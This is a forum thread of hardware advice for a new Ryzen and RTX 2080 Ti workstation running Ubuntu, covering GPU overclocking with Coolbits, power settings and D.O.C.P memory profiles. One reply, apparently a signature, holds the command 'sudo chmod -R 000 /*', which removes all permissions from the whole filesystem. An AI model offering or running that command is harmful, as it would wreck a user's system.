How to increase GPU performance on Ubuntu 20.04? (getting a new custom PC in few days)

I will be getting a new PC delivered to me in the next 3 days. This is the first time I am getting a custom PC. The specs of the PC are:

1. Ryzen 9 3900x
  2. MSI RTX 2080ti TRIO
  3. MSI x570 gaming pro carbon ac wifi
  4. NZXT kraken x63 cooler
  5. Samsung EVO 970 plus 1TB
  6. Corsair HX1000 power supply
  7. 32GB 3600MHZ RAM
  8. Cooler master H500m

I am in that confusing stage where I don't know what is the best option for me. I would be using Ubuntu 20.04 only (for AI research). Can someone help me with these questions?

1. Overclocking GPU (my use case for this PC would be always be GPU bound, so how to get the max performance out of my GPU without destroying it. There is nvidia-xserver-settings. Is it enough that I select the Max performance setting there, or is there something else that I have to do?)
  2. How to configure BIOS for best performance? Do you have some specific settings that I should adjust for increasing performance? I have never used modern graphical BIOS.
  3. There is something that people do to overclock their CPU so that Ryzen can use 3600 MHZ RAM more effectively (I think Ryzen supports 3200 MHZ by default)?

2 minutes ago, Kushaj said:

Overclocking GPU (my use case for this PC would be always be GPU bound, so how to get the max performance out of my GPU without destroying it. There is nvidia-xserver-settings. Is it enough that I select the Max performance setting there, or is there something else that I have to do?)

selecting maximum performance will yield the best performance without overclocking. If you want to overclock (obviously at your own risk, though that risk is typically pretty low) you need to enable the relevant settings https://wiki.archlinux.org/index.php/NVIDIA/Tips_and_tricks#Enabling_overclocking

4 minutes ago, Kushaj said:

How to configure BIOS for best performance? Do you have some specific settings that I should adjust for increasing performance? I have never used modern graphical BIOS.

Just select "high performance" power settings or whatever the equivalent is for you.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

6 minutes ago, Kushaj said:

Overclocking GPU (my use case for this PC would be always be GPU bound, so how to get the max performance out of my GPU without destroying it. There is nvidia-xserver-settings. Is it enough that I select the Max performance setting there, or is there something else that I have to do?)

Along with the coolbits settings that @Sauron linked to, GreenWithEnvy can help aid you with this if you need a Graphical Interface to deal with overclocking. You may ask in the Graphics Card sub-forum for more information on general overclocking with NVIDIA.

10 minutes ago, Kushaj said:

There is something that people do to overclock their CPU so that Ryzen can use 3600 MHZ RAM more effectively (I think Ryzen supports 3200 MHZ by default)?

Specification is rated for 3200 MHz, many people can hit 3600 however just fine. I happen to have a build however that wont post past 3200 MHz without dropping the FCLK, so YMMV. You would enable D.O.C.P  in the BIOS, you would need to poke around the Bios to find it or refer to your motherboards manual.

15 minutes ago, Kushaj said:

How to configure BIOS for best performance? Do you have some specific settings that I should adjust for increasing performance? I have never used modern graphical BIOS.

You could set all your cores to a locked voltage and frequency. Depending on the applications you plan to use however, it could make it perform worse. You would need to determine if what you do benefits more from single core performance or a locked all core that's always ready to go. Most applications will favor that single core boost however.

Really other than that, would just be the kernel and cpu scheduler you use. Unfortunately I don't have any reference to how different kernels and schedulers perform in different situations apart from Gaming, it is however something you could play around with once you get your system up and running. The stock kernel and scheduler may be more than fine for what you need.

• 3 weeks later...

Guys can you please help me? I just received the machine and I am not able to install Ubuntu on it. I have posted the details on the forums. I need your help badly.